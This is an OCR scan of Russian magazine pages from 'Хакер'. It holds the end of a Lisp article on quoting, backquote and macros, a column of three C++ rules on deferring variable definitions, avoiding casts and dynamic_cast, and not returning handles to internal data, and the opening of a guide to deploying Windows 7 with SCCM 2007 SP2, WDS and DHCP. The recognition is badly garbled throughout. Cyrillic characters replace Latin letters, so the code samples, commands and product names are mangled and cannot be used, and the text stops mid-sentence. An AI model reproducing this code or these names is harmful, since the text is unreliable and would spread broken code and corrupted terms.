(саг 1 " " ЪедіпЫезкебЬі зк " " окЬегБака " 34 43)) 

' ( + 5 шуѵаг ) 

(+ 4 5) 

' (Іізк (таке- іпзкапсе 'сіазз) 

(таке-іпзкапсе * зкапбагб-сіаз з ) ) 

" епбЬезкебЬі зк " ) 

" епбМаіпЬі зк " ) 

Пусть этот код тебя не смущает, так как, по большей части, тут исполь- 
зуются ТОЛЬКО три функции: 

«ІІ5І» — строит список из любых (!) элементов данных (вычисляя свои 
аргументы, как любая функция лиспа]. 

«+-» — догадайся сам :]. 

« 1 » — сокращенное применение функции циоіе. На самом деле, выра- 
жение ‘(+ 4 4] превращается в (циоіе (+ 4 4]], что позволяет «процити- 
ровать» выражение (+ 4 4], а не вычислять его. Писать (циоіе (+ 4 4]] 
идеологически правильно, но «цитировать» надо так часто, что даже 
самые закоренелые идеологи Лиспа вовсе не прочь использовать 
знак «V Может показаться, что здесь имеет место «сделка» со строги- 
ми правилами языка. Ничего подобного не происходит — символ « » 
связывается с так называемым «Макросом чтения», который делает 
возможности языка просто безграничными! Все остальное в приве- 
денном выше вызове — это данные. 

Но у Лиспа (как обычно) найдется еще кое-что. Последователи любой 
религии согласятся с тем, что повторения в коде — почти всегда 
плохо. Если у нас имеет место внушительный объем цитируемых 
данных, но есть несколько вычисляемых элементов, то мы можем вос- 
пользоваться обратным цитированием, пометив с помощью «,» те эле- 
менты которые все же надо вычислить. Знаки «'» и «,» являются лишь 
сокращением и также связаны с макросами чтения: 

1 (4 " 1 е а к " 

, (саг 1 ( " ЪедіпЫезкебЬізк " " оккегБака " 34 43)) 

(+ 5 шуѵаг) 

,(+45) 

(Іізк (шаке-іпзкапсе 'сіазз) 

(шаке- іпзкапсе ' зкапсіагсі-сіазз ) ) 



/ \ 

/ і \ 

/ [ \ 

зутЬо! I 5.5 
Ы5Т 
А 

/ \ 

"зъгіпд" Ы5Т 

Л 

/ \ 

: пишЬег 555 

ДРЕВОВИДНАЯ СТРУКТУРА 

" епсШезкесІЬізк " ) 

" епсІМаіпІіі зк " ) 

Вызов: '((1+ 3) ,(+45)) превращается во что-нибудь вроде: 

(ЗУЗТЕМ: : ВАСКО -ызт (Оіготе (1+ 3)) (+4 5)). Обратное 

цитирование особенно интенсивно применяется в макросах, потому 
что позволяет сделать процесс генерации кода более читабельным. 
Судите сами — без макросов: 

(Іізк ( дек-ргодгаш-сіек-паше ) 

(Іізк ( дек - агд-паше роз-агді) ' агд2 ) 

(іізк саіі-іізкі саіі-1ізк2) 

) 

; ; С применением обратного цитирования: 

1 (, (дек-ргодгаш-сіек-паше) 

(,(дек-рагаш роз-рагаші) агд2 ) 

саіі-іізкі 

саіі-1ізк2 

) 

То есть, просто в двух местах нужно произвести вычисление и подста- 
вить результаты в общий шаблон кода (а шаблон кода, между прочим, 
можно передать в качестве параметра). 

Возможно, когда это увидят сторонники традиционного подхода, они 
начнут говорить что-то вроде: «да зачем, да это все в жизни непри- 
менимо...» и так далее. Вот что в жизни точно ПРИМЕНИМО, так это 
фантазия! Мы могли бы эту возможность использовать для генерации 
хті на стороне сервера, и выглядело бы подобное примерно так: 

• ( каЫе 
( кЬобу 

(кг (кб паше) 

( кб , паше ) ) 

(кг (кб аббгезз) 

(кб , ( дек-аббгезз-Ьу-паше паше) ) ) 

)) ; епб кЬобу, каЫе 

Остались сомнения? Попробуй написать аналогичную программу на 
Заѵа, и они исчезнут. 

ЗАКЛЮЧЕНИЕ 

К сожалению, очень многое осталось за бортом. Например, такие 
крайне интересные возможности, как: 

• Уникальное средство разбора сложных структур данных. 

• Средства определения других языков. 

• Декларативное описание циклических процессов. 

И многое другое. Тем не менее, из написанного ты видишь, что Лисп 
— это не только язык для седовласых старцев, а вполне прагматичный 
инструмент решения насущных проблем программирования. На пока- 
занных примерах видно, что никакой особой сложности в языке нет, и 
его идиомы прекрасно интегрируются друг с другом. Начало положено, 
теперь дело за тобой: исследуй, экспериментируй и то, что казалось 
сложным, обязательно станет очень простым и полезным, т 
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КОДЕРСКИЕ 

ТИПСЫИТРИКСЫ 

Три правила кодинга на С++ для настоящих спецов 

ПРОДОЛЖАЕМ ИЗУЧАТЬ ПОДВОДНЫЕ КАМНИ ЯЗЫКА С++. В ТРЕТЬЕЙ 
ЧАСТИ ЭТОГО ЭПИЧЕСКОГО ПОВЕСТВОВАНИЯ МЫ. КАК ВСЕГДА. 
УЗНАЕМ ТРИ ПРАВИЛА. БЛАГОДАРЯ КОТОРЫМ ЖИЗНЬ ПРОСТОГО СРР- 
КОДЕРА СТАНЕТ ЧУТОЧКУ ПРОЩЕ. ЧИТАЕМ И ПРОСВЕЩАЕМСЯ! 



В общем случае разработка программы 
сводится копределению классов и объявле- 
нию функций. Если сделать это правильно, 
то реализация будет нетакуж и сложна. Тем 
не менее, на некоторые моменты внимание 
обращать стоит. Например, слишком раннее 
определение переменных может плохо по- 
влиять на производительность кода. Частое 
приведениетипов может за медлить исполне- 
ние программы, а также провоцировать трудно 
устранимые ошибки. Возврат дескрипторов 
внутренних данных объекта может нарушить 
принцип инкапсуляции и порождать«висячие 



дескрипторы». Решение всех этих проблем мы 
и обсудим ниже. 

ПРАВИЛО №1 

Каждый раз при объявлении переменной, при- 
надлежащей типу, который имеет конструктор 
или деструктор, программа тратит время и на 
его создание, когда потокуправления дости- 
гаетее определения, и на уничтожение — при 
выходе переменной из области видимости. Эти 
расходы системных ресурсов приходится не- 
сти даже когда переменные не используются и 
поэтому избегать их оченьжелательно. 



Многие могут подумать, что в их коде неттаких 
висячих переменных, тем более что практиче- 
ски все современные компиляторы предупре- 
ждают программиста о таких случаях. Но на 
самом деле, объявить переменную, а потом 
«забыть» про нее, гораздо проще, чем кажется 
Рассмотрим следующий пример: 

Неиспользуемая переменная 

епсгуріесі 

зСсІ: : зСгіпд епсгурЦРаззѵгогсІ ( 
сопзС зСсІ: : зСгіпд &раззѵ\гогс!) 

{ 
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изіпд патезрасе зДсІ; 
зСгіпд епсгурРесі; 

іі (раззжэгсі. ІепдРЪ. ( ) < МіпітитРаззілгогсІЬепдЦЪ.) 

{ 

гіпгоы 1одіс_еггог ( "Слишком короткий пароль" ) ; 

} 

// действия по шифрованию пароля 



геЪигп епсгурресі; 

} 

В этом коде функция епсгуріРаззѵѵогсІ возвращаетзашифрованный 
пароль при условии, что его длина не меньше некоторого минимума. В 
случае, если передаваемый пароль неудовлетворяеттребуемым пара- 
метрам, функция возбуждает исключение. Нельзя сказать, что объект 
епсгуріеб совсем не используется в коде, но в случае возбуждения ис- 
ключения конструктор и деструктор переменной проработают впустую. 
Исправить это можно, отложив определение епсгуріеб до того момента, 
когда она будет нужна: 

Определяем епсгуріесі в правильном месте 

зСсі: : зСгіпд епсгурРРаззтлгогс! ( 
сопзС зСсі: : зСгіпд &раззѵ\гогс1) 

{ 

изіпд пашезрасе зРсІ; 

іі (раззжэгсі. ІепдРЪ. ( ) < МіпішишРаззѵ^огсіЬепдЫт) 

{ 

ЦЬгом 1одіс_еггог ( "Слишком короткий пароль" ) ; 

} 

зСгіпд епсгурресі; 

// действия по шифрованию пароля 

геДигп епсгурресі; 

} 

Код еще не настолько эффективен, какмогбы быть.таккакпеременная 
епсгуріесі определена без начального значения. Следовательно, 
при ее объявлении будет использован конструктор по умолчанию. 
Часто перед использованием объектов приходится инициализиро- 
вать их с помощью оператора присваивания. В большинстве случаев 
гораздо оптимальнее инициализировать объекты сразу с помощью 
их конструкторов. Это справедливо и для епсгуріесі. Допустим, у нас 
есть функция, которая выполняеттрудную часть шифрования: ѵоіб 
епсгурііізісі : :5І;гі пд & в). Тогда епсгуріРаззѵѵогб может быть реализована 
следующим образом: 

Возможная реализация епсгурІРаззѵѵогсі 

зСсІ: : зСгіпд епсгурРРаззѵ\гогс1 ( 
сопзС зСсІ: : зСгіпд &раззѵ\гогс!) 

{ 

// проверка длины 

зСгіпд епсгурресі; 
епсгурресі = раззѵтогсі; 



епсгурЦ (епсгурресі) ; 
геіигп епсгурресі; 

} 

Но гораздо лучше, и даже можно сказать правильней, будет ини- 
циализировать епсгуріеб нес помощью оператора присваивания, а 
посредством конструктора. Нужно нетолько откладывать определение 
переменной до момента ее использования, но и постараться отложить 
это определение до момента получения аргументов для ее инициали- 
зации. 

Правильная реализация епсгурІРаззѵѵогсІ 

зСсІ: :зСгіпд епсгурРРаззѵ\гогс1 ( 
сопзі зСсІ: : зСгіпд &раззѵгогс1) 

{ 

// проверка длины 

зРгіпд епсгурРес! (раззѵлэгсі) ; 
епсгурЦ (епсгурРес!) ; 
г е г. и г г. епсгурресі; 

} 

Теперь немного поговорим о циклах. Изтого, что мы узнали выше, мож- 
но заключить, что есть два способа использования переменных внутри 
цикла: объявить ее внетела цикла и каждый раз присваивать новое зна- 
чение, или конструировать новый объект при каждой итерации. В коде 
это будет вы глядеть та к: 

Что лучше? 

// Подход А: определение вне цикла 

МйдеЦ м; 

іог ( іпР і = 0 ; і<п; + + І) { 

ъг = некоторое значение, зависящие от і; 

} 

// Подход В: определение внутри цикла 

Рог ( іпР і = 0 ; і<п; + + і) { 

Ѵ/іс ідеС тл (некоторое значение, зависящие от і) ; 

} 

Здесь мы специально переходим кобъектам класса ѴѴібдеЕ чтобы 
уйти от конкретики. В общем случае накладные расходы для подхода А 
равны «1 конструктор + 1 деструктор + п присваиваний». Для подхода 
В — «п конструкторов + п деструкторов». ПодходА оказывается более 
эффективным для классов, у которых стоимость операции присваива- 
ния меньше, чем пары «конструктор + деструктор». В противном случае, 
возможно, подход В лучше. Если нетточной информации, что присваи- 
вание обходится дешевле, чем пара «конструктор + деструктор», и речь 
идето коде, производительность которого критична, то поумолчанию 
лучше использовать подход В. 

Из первого правила следует вывод: нужно стремиться откладывать 
определение переменных настолько, насколько это возможно. Это 
делает программы ясными и более эффективными. 
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СООІКІО 



1 




ПРАВИЛО №2 

С++ оченьстрого относится ктипизации переменных. Это даетопреде- 
ленную гарантию, что, если твоя программа компилируется без ошибок, 
то она не выполняет никаких бессмысленных и опасных действий. 
Механизм приведения типов обходит эту систему, что может вызвать 
достаточно серьезные проблемы. Программисты, пришедшие в С++ 
из мира Ыѵа, С или С#, должны относиться к приведениютипов в этом 
языке с гораздо большим почтением, поскольку в приплюснутом си это 
оченьтонкая операция. 

В С++ существуеттритипа синтаксиса для приведения типов: син- 
таксис в стиле языка С (выглядит примернотак: (Т) ехргеззіоп], 
функциональный синтаксис (Т (ехргеззіоп)] и синтаксис в стиле С++ 
(соп5І_са5І<Т>(ехргез5Іоп), бупатіс_саз1;<Т> (ехргеззіоп], геіпІегргеІ_ 
саз1;<Т>(ехрге55Іоп] и 5І:а1:іс_са5І:<Т>(ехрге55Іоп)]. Первые два синтакси- 
са по сути идентичны, а вотприведениетипов в стиле С++ отличается 
узкой направленностью каждого из четырех операторов. 

Рассказывать сейчас об отличиях этих операторов я не буду. Скажу 
лишь, что предпочтительнее использовать приведение в стиле С++, 
так как, во-первых, их легче найти в коде (и человеку, и специализиро- 
ванным инструментам), что упрощает поискузких мествтипизации, а 
во-вторых, узкоспециализированное назначение каждого из операто- 
ров позволяет компилятору эффективнее выявлять ошибки типизации. 
Например, если попытаться избавиться от константности, используя 
любой оператор приведения в стиле С++, кроме сопзІ_сазІ, код не от- 
компилируется. 

Многие программисты думают, что приведениетипов лишьуказывает 
компилятору как трактовать ту или иную переменную, но это не всегда 
так. В большинстве случаев при приведении генерируется дополни- 
тельный исполнительный код. Например, если преобразовывать пере- 
менную типа іпі ктипу боиЫе,то в подавляющем большинстве случаев 
будет создан исполнительный код, так как во многих архитектурах 
внутреннее представление іпі отличается отбоиЫе. 

Болеетого, если мы возьмем указатель дочернего класса и приведем 
его к базовому, то и в этом случае мы получаем исполнительный код. 
Компилятор может прибавлять смещение для получения нужного 
адреса. Получается, что у одного и того же объекта может быть несколько 
адресов в памяти. Такое невозможно ни в С#, ни в Ыѵа и С, но возможно 
в С++. При использовании множественного наследования такое случа- 
ется сплошь и рядом. 

Все усугубляется еще и тем, что компилятор может прибавлять сме- 
щение, а может и нет. Каждая версия размещает объекты в памяти по 
собственным правилам, поэтому программист не должен делать ника- 
ких предположений относительно размещения этого объекта в памяти, 
атем более выполнять на основеэтих предположений преобразования 
типов. 

Оператор бупатіс_са5І: требует отдельного разговора. Самая распро- 
страненная его реализация основывается на сравнении имен классов 
посредством функции зігстр. Из-за этого вызовы оператора приведе- 
ния очень накладны. Особенно это становится заметно, когда бупатіс_ 
саз! применяется к большим иерархиям классов с множественным 
наследованием. 

Необходимость в этом операторе обычно появляется из-за того, что про- 
грамм ист желает выполнить операции, определенные в производном 
классе, для объекта, который предположительно принадлежит произво- 
дному классу, но при этом в распоряжении имеется только указатель на 
базовый класс, посредством которого нужно манипулировать объектом. 

Типовое использование с1упатіс_сазІ 

сіазз Шіпскж {...}; 

сіазз ЗресіаШіпскж: риЫіс Шіпскж { 

риЫіс : 




ѵоіЬ Ыіпк ( ) ; 



} ; 



РуреЬеР зРсі: : ѵесРог<зРсі : : Ргі : : здагеЬ^Рг<ЫпЬом>>ѴРЫ 
ѴРШ ЫпРРгз ; 



Рог {ѴШ: :іРегагог ІРег = ЫпРРгз . Ьедіп ( ) ; 

ІРег ! = ЫпРРгз . епсі ( ) ; 

++іРег) { 

іР (ЗресіаШіпскж рзм = 

Ьупатіс_сазР<8ресіаШіпсіоѵ\г> (іРег->деР ( ) ) ) 
рзм->Ыіпк ( ) ; 



} 



Есть два основных способа избежать подобного. Первый — исполь- 
зовать контейнеры для хранения указателей на сами объекты произ- 
вольных классов, тогда отпадет необходимость манипулировать этими 
объектами через интерфейсы базового класса. Например, если в нашей 
иерархии ѴѴ і п сі оѵѵ/5 р е с і а ІѴѴ і п сі оѵѵ тол ь ко Зресіа ІѴѴіпсІоѵѵ поддерживает 
мерцание (Ыіпкіпд) , то бупатіс_са5І: можнозаменитьтак: 

Используем контейнеры вместо сІупатіс_са5І 

РуреЬеР зРЬ: : ѵесРог<зРс! : :Рг 1 : : зЪ.агес 1 _рРг 
< 8 ресіаШіпскж>> ѴР 8 Ш; 

ѴР 8 М ЫпРРгз; 



Рог ( ѴР8М : : іРегаРог іРег = ЫпРРгз . Ьедіп ( ) ; 

іРег ! = ЫпРРгз . епсі ( ) ; 

++іРег ) 

( *іРег ) ->Ыіпк ( ) ; 

Конечно, такой подход не позволяетхранитьуказатели на объекты всех 
возможных производных от ѴѴіпбоѵѵ-классов в одном и том же контей- 
нере. Но есть альтернатива — предусмотреть виртуальные функции 
в базовом классе, которые позволяют делать именното, что нужно. 
Например, можно ввести поддержку мерцания в базовом классе в виде 
виртуальной функции, которая не производит ни каких действий: 

Виртуальные функции вместо сІупатіс_са5І 

сіазз Ыпскж { 
риЫіс : 

ѵігРиа! ѵоісі Ыіпк ( ) {}; 



} ; 



сіазз ЗресіаШіпсіом: риЫіс Міпскж { 
риЫіс : 

ѵігРиаІ ѵоісі Ыіпк ( ) {...}; 



} ? 



РуреЬеР зРсі: : ѵесРог<зРсі: :Рг1: : здагеЬ_рРг<ЫпЬом»ѴРЫ 
ѴРМ ЫпРРгз; 

Рог (ѴРШ: :іРегагог ІРег = ЫпРРгз . Ьедіп ( ) ; 

іРег ! = ЫпРРгз . епсі ( ) ; 

++іРег ) 

( *іРег ) ->Ыіпк ( ) ; 

Ни один из этих подходов не является универсальным, но во многих 
случаях они представляют полезную альтернативу бупатіс_са5Р Чего 
действительно стоит избегать, так это каскадов операторов бупатіс_ 
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сазС В этом случае генерируется объемный и медленный код, который к 
томуже еще и довольно нестабилен. 

В итоге надо запомнить, что следует по возможности избегать приведе- 
ниятипов, особенно с использованием бупатіс_са5І;, в критичном по 
производительности коде. Когда приведениетипа необходимо, нужно 
постараться скрыть его внутри функции. Крометого, предпочтительнее 
использовать приведения в стиле С++. 

ПРАВИЛО №3 

Итак, мы подошли к самому интересному. Представим, чтоу нас есть 
класс, который работаете прямоугольником. Параметры фигуры в нем 
заданы левым верхним и правым нижнимуглом прямоугольника. Чтобы 
объект Ресіапдіе оставался компактным, можно описать определяющие 
его точки во вспомогательной структуре. При этом сам объект будет 
предоставлять интерфейс для чтения этихточек. 

Описание класса прямоугольника 

сіазз РоіпС { 
риЫіс : 

Роіпб (іпС х, іпС у) ; 

ѵоіеі зеСХ(іпС пеѵ\А/а1) ; 
ѵоіеі зебУ (іпб пеѵ\А/а1) ; 

} ; 

збгисб КесБаба { 

Роіпб иібю; 

Роіпб 1гЬ.с ; 

} ; 

сіазз Кесбапдіе { 
риЫіс : 

Роіпб& иррегБебб () сопзб {гебигп рБаба->и11тс ; } 
Роіпб& ІомегКідІтб ( ) сопзб {гебигп рБаба->1г!іс ; } 
ргіѵабе : 

збеі: : бгі : : зЪагес1_рбг<КесБаба> рБаба; 

} ; 

Функции иррегЕеН и ІоѵѵегВідЫ: возвращают ссылку на объект класса 
Роіпі, поскольку пользовательскиетипы гораздо эффективнее пере- 
давать по ссылке или указателю. Исходный код в примере откомпилиру- 
ется, но он неправильный! 

С одной стороны, иррегбеИ и ІоѵѵегРід Ы; объявлены как константные 
функции-члены, посколькуони предназначены только для того, чтобы 
предоставить клиенту способ получить информацию оточках прямоу- 
гольника, недавая ему возможности модифицировать объект РеФапдІе. 
С другой стороны, обе функции возвращают ссылки на закрытые 
внутренние данные, с помощью которых затем можно модифицировать 
внутренние данные. 

Все плохо 

Роіпб соогс11(0, 0); 

Роіпб соогс12 ( 100 , 100); 

сопзб Кесбапдіе гес (соогсіі, соогсі2 ) ; 

// меняем внутренние данные объекта 
гес .иррегБебб ( ) . зебХ(50) ; 

В примере мы удачно изменяем одно из внутреннихзначений объекта, 
хотя, по задумке, этого сделать невозможно. Если бы мы возвращали 



итераторы или указатели, проблема была бы той же самой. Возвраще- 
ниетакого «дескриптора» внутренних данных объекта — прямой путь 
к нарушению принципов инкапсуляции. Решить проблему довольно 
просто, достаточно лишь применить квалификатор сопзі: к возвращае- 
момутипу. 

ПРАВИЛЬНОЕ ОБЪЯВЛЕНИЕ ФУНКЦИЙ 

сіазз Кесбапдіе 
{ 

риЫіс : 

сопзС РоіпР& иррегЬеІС ( ) сопзб {геСигп рБаЦа->и1]тс ; } 
сопзі. РоіпЦ& ІоѵгегКідЪ.6 ( ) сопзб {геСигп рБа1іа->1г]тс ; } 

} ; 

В результате такого изменения пользователи смогут читать объекты 
Роіпі, но не смогут изменить их. 

Что касается проблемы инкапсуляции, то мы с самого начала 
намеревались дать клиентам возможность видеть объекты 
РоіпЕ поэтому в данном случае ослабление инкапсуляции на- 
меренное. 

Но даже так иррегбе^ и ІоѵѵегРідЫ: возвращают «дескрипторы» вну- 
тренних данных объекта, что может вызвать проблемутак называемых 
«висячих дескрипторов», то есть дескрипторов, ссылающихся на части 
уже несуществующих объектов. Рассмотрим пример: 

Висячий дескриптор 

сіазз СІЛОкфесб {...}; 

сопзС Кесбапдіе ЬоипбіпдВох ( сопзб С1ЛОкдесС& обд ) ; 
СІЛОЬдесб *рдо; 

сопзб Роіпб *рІІррегЬеІЦ = 

& (ЬоипбіпдВох ( *рдо) .иррегЬеШО ) ; 

Вызов ЬоипбіпдВох вернет временный объект Ресіапдіе. Затем 
вызовется функция-член иррегбеіЧ этого временного объекта, 
и этот вызов вернет ссылку на внутренние данные временного 
объекта, в нашем случае — на один из объектов класса РоіпЕ 
Присвоив это значение переменной рІЧррегЕеІЧ, можно на- 
деяться, что оно останется неизменным, но временный объект, 
возвращаемый ЬоипбіпдВох, уничтожится сразу в конце пред- 
ложения и рііррегбей будет ссылаться на несуществующий в 
памяти объект. 

Вот почему опасна любая функция, которая возвращает «дескрип- 
тор» внутренних данных объекта. Это не значит, что никогда не 
следует писатьтакие функции. Иногда они бывают необходимы. 
Например, орега1:ог[] возвращает ссылку на данные в контейнере, 
которые уничтожаются вместе с контейнером. Но это все же исклю- 
чение, а не правило. 

Следует избегать возвращать «дескрипторы» (ссылки, указатели, итера- 
торы] внутренних данных объекта. Это повышает степень инкапсуляции 
и минимизирует вероятность появления «висячих дескрипторов». 

ЗАКЛЮЧЕНИЕ 

На этом сегодняшнее повествование можно считать законченным. В 
следующий раз мы продолжим знакомиться с правилами и советами, 
касающимися особенностей реализации программ на С++. Общими 
усилиями мы победим это великоетворение Бьерна Страуструпа. До 
встречи ! тг 



ХАКЕР 01 /ізз/ ю 



► 107 






ЗУИ/АСК 




ЦЕНТРАЛИЗОВАННОЕ РАЗВЕРТЫВАНИЕ ѴѴІЫ00ѴѴ5 7 
ПРИ ПОМОЩИ 5ССМ 2007 5Р2 

В зависимости от структуры организации и количества подчиненных 
систем, процесс развертывания новой ОС может быть достаточно слож- 
ным и занятьзначительную часть времени. Использование 5ССМ 2007 
позволяет максимально автоматизировать и упростить этот процесс, 
произвести переход быстро, практически не прерывая работу компании. 



ЗАЧЕМ НАМ 5ССМ 2007? Полная установ- 
ка или переустановка любой ОС подобна 
ремонту. Необходимо не только обеспечить 
сотрудника рабочим местом на время этого 
мероприятия, но и затем перенести все личные 
настройки, чтобы пользователь вернулся в 
«свою» систему. Даже для одного компьютера 
это целый процесс, а если их десятки или со- 
тни? Без специальных инструментов админис- 
тратор обречен бегать по этажам и заниматься 
установками не одну неделю, попутно выпол- 
няя и штатные обязанности, коих на период 
обновления, как нарочно, становится больше. 
Чтобы облегчить труд админа, корпорация 
Місго50Й предлагает ряд специальных инстру- 
ментов: ѴѴАІК (ѴѴіпсіоѵѵз Ашотаіесі Іпзіаііайоп 
Кіи), ѴѴББ (ѴѴіпсІоѵѵз Оеріоутепі: Бегѵісез), МБТ 
(МісгозоЙПерІоутешТооІкіі:) и 5ССМ (Бузіет 
Сетег СопЯ^игагіоп Мапа^ег) . 

Перед тем, как продолжить дальнейшее 
повествование, напомню, что установка и 
некоторые возможности БССМ 2007 К2 были 
подробно рассмотрены в статьях «Начальник 
сети» и «Оружие массового управления», опуб- 
ликованных, соответственно, в августовском и 
сентябрьском номерах ил за 2009 год. 

БССМ поддерживает несколько ролей, опреде- 
ляющих его функциональность, в частности, 
компонент Орегайп^ Бузіет Періоутепі: (ОБО, 
средства развертывания операционных сис- 
тем) как раз и отвечает за развертывание ОС, 
позволяя распространить образ ОС на любое 
количество систем. Процедура развертывания 
происходит в полностью автоматическом 
режиме безучастия администратора (при 
определенных настройках) . Для установки 
ОС можно применить установочный диск. 



захваченный ѴѴІМ образ эталонной системы, 
либо использовать свой вариант системы с 
интегрированными драйверами и приложени- 
ями. Наличие в 5ССМ единой базы драйверов 
только упрощает этот процесс. Напомню, 
что 5ССМ имеет функции установки прило- 
жений и обновлений, поэтому эти операции 
можно разделить. Собственно, более широкое 
управление процессом развертывания и есть 
главное отличие 5ССМ от ѴѴИБ. Используя все- 
го один образ, можно легко развернуть любое 
количество ОС с разным софтом и драйверами. 
В случае Ѵ\Ш5 нам бы пришлось задействовать 
несколько образов, либо доустанавливать 
программы самостоятельно или при помощи 
групповых политик. Технология «2его Тойей» 
позволяет получить полностью готовый к ра- 
боте компьютер, просто подключив его к сети 
и не нажав при этом ни одной клавиши. 
Функция 5ССМ под названием «Управление тре- 
буемой конфигурацией» (Иезігесі Сопй^игагіоп) 
позволяет сразу сформировать коллекцию 
компьютеров, по разным признакам. Например, 
для одних гарантировано имеются все драйвера, 
и их конфигурация удовлетворяет всем реко- 
мендациям МІСГО 50 ІГ, другие же не подходят для 
установки новых версий ОС. 

Также не забываем, что развертывание может 
выполняться на чистый компьютер или про- 
изводится обновление уже рабочей системы 
(миграция) . В первом варианте проблем 
обычно не возникает. Зато второй может 
преподнести ряд сюрпризов. Так, пользова- 
тель захочет, чтобы после переустановки все 
программы, ярлыки и всякие рюшечки нахо- 
дились на своих местах, а значит, их вначале 
нужно сохранить и затем после установки ОС 



восстановить. То есть, в итоге при миграции 
получаем еще один важный шаг, который 
нельзя игнорировать. Обычное копирование 
не всегда спасает, — могут быть проблемы с 
зашифрованными данными, открытыми про- 
граммами, блокирующими доступ к файлам, 
и т. д. Кроме всего прочего, процесс займет 
довольно много времени. Миграция же средс- 
твами 5ССМ достаточно проста и может быть 
выполнена на тот же или другой компьютер. 
Альтернативой миграции может стать исполь- 
зование биаІ-Ьооі: (например, ѴѴіпХР и ѴѴіп7) в 
том случае, когда имеется специфическое ПО, 
для которого пока нет версии под новую ОС. 
Задачу перемещения пользовательских дан- 
ных решает тулкит ІІ5МТ (ІІзег Бтате Мі^гагіоп 
Тооікп) версии 4.0, одна из особенностей 
которого - поддержка йагб-Нпк миграции, 
когда вместо копирования данных на другой 
носитель с последующим восстановлением 
(а при значительных объемах такая проце- 
дура займет прилично времени) эти данные 
на диске просто помечаются указателями и 
восстанавливаются в процессе установки ОС. 
Кроме ІІБМТ, в состав 5Р2 входит ѴѴАІК 2.0, под- 
держивающий ѴѴіп7. 

Для распространения образов на клиентские 
компьютеры ОББ обучен нескольким методам. 
В зависимости от того, какие из них будут 
использоваться, понадобится наличие допол- 
нительных сервисов. Самым удобным явля- 
ется РХЕ-метод, позволяющий производить 
полностью автоматизированную установку. 
Метод требует наличия в сети: ѴѴББ (служба 
удаленной установки ѴѴіпсІоѵѵз) для первона- 
чальной загрузки системы ѴѴіпРЕ (ѴѴіпсІоѵѵз 
Ргеіпзіаііайоп Епѵігоптепі:), плюс БНСР для 
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получения клиентом сетевых настроек. Если для установки ѴѴіп2к8 и 
ѴІ5Иа 5Р1 требовался ѴѴіпРЕ 2.1, то для ѴѴіп7 необходим уже ѴѴіпРЕ 3.0. 
Версия 5ССМ 2007 с редакцией К2, о которой говорилось в предыду- 
щих номерах журнала, не поддерживает новые ОС от Місгозой:, для 
этого нам понадобится 5Р2, который был анонсирован вместе с ѴѴіп7 
и ѴѴіп2к8К2. Для загрузки доступно два варианта: собственно 5ССМ 
5Р2 «Риіі ішііаіі» и Ир^гасіе для 5Р1 (примечательно, что их размер 
одинаков - 1314 Мб), единственный минус — отсутствие на данный 
момент локализованной версии (поэтому пока придется использовать 
английскую сборку), хотя, по обещаниям разработчиков, она вот-вот 
должна появиться. Также в ближайшее время ожидается обновление 
5ССМ 2007 КЗ; особых изменений в нем не предвидится, и, в основном, 
они будут связаны с управлением питанием. 

Апдейт 5Р2 полностью поддерживают как ранние ОС от ѴѴіп2к 5Р4 до 
Ѵізт 5Р1, так и новинки ѴѴіп7, Ѵізііа 5Р2, ѴѴіп2к8 К2 и 5Р2. Кроме того, в 
5ССМ 2007 5Р2 добавлен ряд полезных функций. Появилась поддержка 
ВгапсЬ. СасЬе (подробнее о нововведении читай в статье «Синхронный 
заплыв на дальнюю дистанцию», опубликованной в т 11 2009Т пол- 
ная поддержка компьютеров, имеющих чип Ішеі ѵРго и ІАМТ йгтѵѵаге 
версий 4 и 5, управление восемью беспроводными профилями и поли- 
тиками питания, настройка 802. 1х и журнал аудита. 

Процесс установки не изменился. Непосредственно перед ее началом 
следует запустить «Кип Оіе ргегециізпе сЬескег», — это поможет опреде- 
лить недостающие компоненты и сэкономить время. 

УСТАН АВЛ И В АЕ М Ѵ\Ш5 Для упрощения будем считать, что 5ССМ у 
нас уже установлен. Наличие на сервере ролей Ѵ\Ш5 и РХЕ на этапе 
«Р^е^е^^15І1:е СЬеск» никак не проверяется и подсказки никакой не выда- 
ется. Но для РХЕ-метода установки они нужны, поэтому ставим. Причем 
необязательно данные сервисы должны быть на том же сервере, что и 
5ССМ. 

Начнем с ѴѴБ5. Открываем Диспетчер сервера и выбираем «Роли-> 
Добавить роли», отмечаем «Службы развертывания ѴѴіпсІоѵѵз». На этапе 
выбора служб ролей будут предложены «Сервер развертывания» (обес- 
печивает полный набор функций служб ѴШ5) и «Транспортный сервер» 
(сокращенный набор функций) . Для функционирования Ѵ\Ш5 в общем 
случае достаточно только управляющего сервера, при необходимости 
доставки образов на удаленные системы, находящиеся в отдельных 
сегментах сети, используется транспортный сервер Ѵ\Ш5. Нажимаем 



«Установить» и ожидаем окончания процесса. В итоге, в Зегѵег Мапа^ег 
появится новая вкладка. Для настройки сервера ѴѴБ5 вызываем из меню 
«Администрирование» консоль «Службы развертывания ѴѴіпсіоѵѵз», 
переходим к нашему серверу и в контекстном меню выбираем пункт 
«Настроить сервер». Запустится мастер настройки, для успешной рабо- 
ты которого потребуется, чтобы компьютер был членом домена, в сети 
были активны БНСР и БЫЗ сервера, а также указано место хранения 
образов на разделе с файловой системой ИТЕЗ. Файлы образов занима- 
ют немало места, поэтому их лучше хранить на отдельном разделе. При 
выборе политики РХЕ-ответа клиентам отмечаем «Не отвечать никаким 
клиентским компьютерам», так как этим будет заниматься 5ССМ. На 
последнем шаге снимаем флажок, отвечающий за добавление образов, 
поскольку образы мы также будем добавлять через консоль 5ССМ. 

В командной строке установка и настройка Ѵ\Ш5 выглядит проще: 

> ЗегѵегМападегСтсі -іпзкаіі ТО8 

> Ж)81ЛТЬ /Іпііііаііге-зегѵег /Кетіпзк : " Б : \ 

КетоРеІпзРаІІ " 

Теперь вызываем из меню «Администрирование» консоль БНСР, 
переходим к нашему серверу (настройка сервиса БНСР детально 
рассмотрена в статье «Эффект неваляшки» в предыдущем номере жур- 
нала), затем ІРѵ4, раскрываем область БНСР и переходим к подпункту 
«Параметры области». Здесь уже есть несколько тегов, указывающих 
на ІР маршрутизатора, ПНЗ-сервераиБНЗ-домена. Нужно добавить 
еще три. Вызываем контекстное меню, щелкаем по пункту «Настроить 
параметры», во вкладке «Общие» активируем параметр «066 Имя узла 
сервера загрузки» и вводим в появившейся внизу строке имя или ІР-ад- 
рес сервера 5ССМ. Аналогично активируем «067 Имя файла загрузки», а 
в предложенном поле вписываем «\5М5Воои\х86\ѵѵЙ5пЪр.сот». 

Тег «060», присутствовавший в настройках в ѴѴіп2кЗ, в ѴѴіп2к8 почему- 
то исчез, но его несложно подключить в командной строке при помощи 
